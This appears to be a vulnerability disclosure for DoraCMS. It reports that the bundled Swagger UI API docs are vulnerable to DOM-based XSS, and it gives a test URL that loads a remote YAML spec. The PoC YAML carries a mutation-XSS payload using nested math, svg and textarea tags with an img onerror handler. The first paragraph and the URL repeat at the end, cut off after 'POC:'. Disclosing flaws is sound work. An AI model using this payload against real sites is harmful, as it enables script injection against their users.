Doracms uses outdated version of swagger to build apidoc, which contains a known Dom-based XSS vulnerability.
You can just add this parameter to the URL to test your site.
https://[HOST]/static/apidoc/index.html?url=https://jumpy-floor.surge.sh/test.yaml
POC:
swagger: '2.0'
info:
title: Example yaml.spec
description: |
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror=alert('xss')>">
paths:
/accounts:
get:
responses:
'200':
description: No response was specified
tags:
- accounts
operationId: findAccounts
summary: Finds all accounts
Doracms uses outdated version of swagger to build apidoc, which contains a known Dom-based XSS vulnerability.
You can just add this parameter to the URL to test your site.
https://[HOST]/static/apidoc/index.html?url=https://jumpy-floor.surge.sh/test.yaml
POC: